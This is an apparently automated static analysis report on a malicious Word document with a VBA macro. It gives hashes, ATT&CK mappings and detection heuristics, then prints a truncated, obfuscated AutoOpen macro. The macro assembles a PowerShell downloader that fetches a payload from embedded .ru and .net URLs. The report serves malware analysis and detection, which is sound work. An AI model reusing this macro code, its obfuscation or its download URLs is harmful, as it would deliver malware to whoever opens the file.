Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eb0373cb1c3d2cc1…

MALICIOUS

Office (OLE)

Size: 176.5 KB
Created: 2017-11-30 21:19:00
Authoring application: Microsoft Office Word
First seen: 2017-12-08
MD5: 0e06807ed053dedb0db492634047e2ef
SHA-1: fc98b44fa5c407cf3c61fea0abe688fa54cfce82
SHA-256: eb0373cb1c3d2cc15ea5ab85c5d27822a1fc69a3131fbce6c964d7551876f94e
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro uses a Shell() call, indicating an attempt to execute external code. The obfuscated script attempts to download a payload from the URL http://www.latoaMh+aMh.ru/aMh+aMhGToaMh+aMhgfl/,aMh+ (as extracted, the URL still carries the aMh+aMh padding tokens that the string-concatenation obfuscation seen in the macro source inserts), which is highly suspicious. The combination of an AutoOpen entry point and a Shell() call strongly suggests downloader or dropper functionality.

Heuristics (7)

  • ClamAV: Doc.Macro.Obfuscation-6387400-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6387400-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.celaMh+aMhebt (in document text, OLE body)
    • http://www.latoaMh+aMh.ru/aMh+aMhGToaMh+aMhgfl/,aMh+ (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 90074 bytes
SHA-256: 96757ec874e26ff5769079ea97f72cd7bfc8d937eab0cd2f70fa916bca816889
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mNOGVQchCh"
Function bptCdwDd()
rhwTqjNj = Array(StrReverse("PmBIcBO"), StrReverse("jSuEAWJiZ"), StrReverse("OZGLcplaNUWq"), StrReverse("LYjwSaA"), StrReverse("fEJVTZXjZJkdn"), StrReverse("UwDKLWBoutsLij"), StrReverse("YrEZsjVzp"), StrReverse("QOrnLlNS"))
WawDR = Mid("Mndom;aM'+'h+aMhYPaah3+ah3Mh'+'+aMhTbcd = aMah3+ah'+'3h+aMBfiwtjbPKvJ5AD", 2, 57)
WzuKPvZjU = Array(StrReverse("zfEVsFldErV"), StrReverse("hjlzWhhVkX"), StrReverse("mjiAKVmK"), StrReverse("AcuRWmk"), StrReverse("FhAvsfPNI"), StrReverse("KJnlscXRm"), StrReverse("FbISjTYEl"), StrReverse("bjwSPCWMt"))
SOEZja = Array(StrReverse("EmuHOdoqJ"), StrReverse("cHqrSBSjD"), StrReverse("OwzNBvIJBjIftV"), StrReverse("idjqvEsLhNB"), StrReverse("WZmsFJYzFm"), StrReverse("GSUipaHwOUPn"), StrReverse("jqHqVnRAAV"), StrReverse("kOqCVVWWrwcX"))
hZRBZNNpdA = Array(StrReverse("okqBXtSJPHOdr"), StrReverse("VhptSitmkCzDio"), StrReverse("bSaTEjh"), StrReverse("NFDaXqoKZZ"), StrReverse("jYwitFwC"), StrReverse("oETKdIn"), StrReverse("oKnRoMcoPEWwv"), StrReverse("YiZFccojOGdhj"))
pIcVRMoX = Mid("HjA7LcYCaaMh+aMhkaMh+aMh;aMh+aMh}catcaMh+aMhh{wrah3+ah3i'+'te-aMh+aMhhoah3+ah3saMh+aMht YaMh+aMhah3+ah3PT_.Exception.Message;}ah3+'+'ah3}aMh) -crEPlaC'+'e  aM6afRFDWm", 9, 150)
JnkBanmUz = Array(StrReverse("ZCkZQnFHmNJ"), StrReverse("ChdRVjFzj"), StrReverse("ajEaswsvbGSjQS"), StrReverse("sjNQdwB"), StrReverse("nTnsEWPWarfc"), StrReverse("UpuGOrm"), StrReverse("wVRLOdz"), StrReverse("jFvZCQHFFnYLj"))
wUzqodUlWnV = Array(StrReverse("mswOCAVP"), StrReverse("ruMVqiBbGEwf"), StrReverse("lYjLAHvhnHfTB"), StrReverse("HItvVJriKP"), StrReverse("zCNiXckd"), StrReverse("HXhrzOTFDmhBoH"), StrReverse("TMJaVwCNRDCFiC"), StrReverse("fuqEOjaCv"))
EaFjw = Array(StrReverse("IFbFJuFNbE"), StrReverse("YuzkZLWrSrR"), StrReverse("jEmUDPEwqo"), StrReverse("qPibjHXTIfHX"), StrReverse("VoASBzkdqf"), StrReverse("AXZBzWIlkLIUrk"), StrReverse("kuXJtZjPzPPmu"), StrReverse("DEzkoaMhWWlXV"))
tcdXCztPWRd = Mid("Rz5HXRduasaMh+aMh);baMh+aMhreARTbrcWcc8O2Ct5G", 8, 22)
PKsjvjd = Array(StrReverse("qmfXhGIu"), StrReverse("KKSJHAFKQn"), StrReverse("JkCmHnLktJtKOT"), StrReverse("KWpjztKPsFN"), StrReverse("iDJZJOzwGksQ"), StrReverse("uYBJQADqcqiUjq"), StrReverse("wVKhtCc"), StrReverse("jkkvQVZadYpC"))
nniKfIF = Array(StrReverse("KMTJhONpGhlUU"), StrReverse("amikNsjH"), StrReverse("kCJaDYBX"), StrReverse("EtEmvFEffN"), StrReverse("SwTGFGknAJcHDD"), StrReverse("GYoKREJPQbCo"), StrReverse("cjiMSJqmjDVwo"), StrReverse("WNcmBiNzj"))
wuJUkrWdK = Array(StrReverse("ThBojcoXnOZ"), StrReverse("kPmQmzGbEi"), StrReverse("SoNSVWWOhSF"), StrReverse("COnKQvoMas"), StrReverse("TwXGfiLp"), StrReverse("kCizTKTBQz"), StrReverse("EfukBzppfQWEZ"), StrReverse("tVzPrjVdfkz"))
KqmJiwYR = Mid("b'h+aMhg.ua/xWRfHaMh+aMhlaMh+aMh/,aMhah3+a'+'h3+aMhhttp://www.celaMh+aMhebt'+'weets.'+'netaMh+'+'aMh/eaMh+aMhdaMh+aMhl/,'+'htah3+a'+'h3tpEQ73IKNGChnEdz8jiiqPh7Um4GR6tc7q", 2, 136)
jYMpcP = Array(StrReverse("VwtJiCfCStLUb"), StrReverse("ouNwWUSOd"), StrReverse("mCooBFdcAqrWP"), StrReverse("DhYTduCClMwH"), StrReverse("QcLYHSDWjO"), StrReverse("AMQiUkYRijspw"), StrReverse("kiokQbqtkMzoSj"), StrReverse("MKWShSR"))
jSVmEa = Array(StrReverse("nqGcmwbBHoC"), StrReverse("EjtVJJOzJXapV"), StrReverse("ZTWazKkVMwjD"), StrReverse("adYUESKLKnA"), StrReverse("WWCWPPQHAW"), StrReverse("ijpsDiTu"), StrReverse("GfoTlDWWKbOf"), StrReverse("GcohzwjSvc"))
FKWkzM = Array(StrReverse("EFNpwIOU"), StrReverse("DZGdKEkjZYPWj"), StrReverse("zrpHjnuj"), StrReverse("aTfjmrfpIB"), StrReverse("SUFVizVVfBDjXt"), StrReverse("zHBhhsWBf"), StrReverse("fVwouiGV"), StrReverse("timTchRYBWXj"))
aFucTHVK = Mid("9lAaiPlkzPDwGJwBG1vcvtJ1bOInvOkE-EXPRessIOn((('(ah3& ( vNpvErBOSepNAnjPjETkAb", 27, 40)
uHhUrzE = Array(StrReverse("VtnOaGc"), StrReverse("sONriilMtuwZI"), StrReverse("IaNEVjXLTKC"
... (truncated)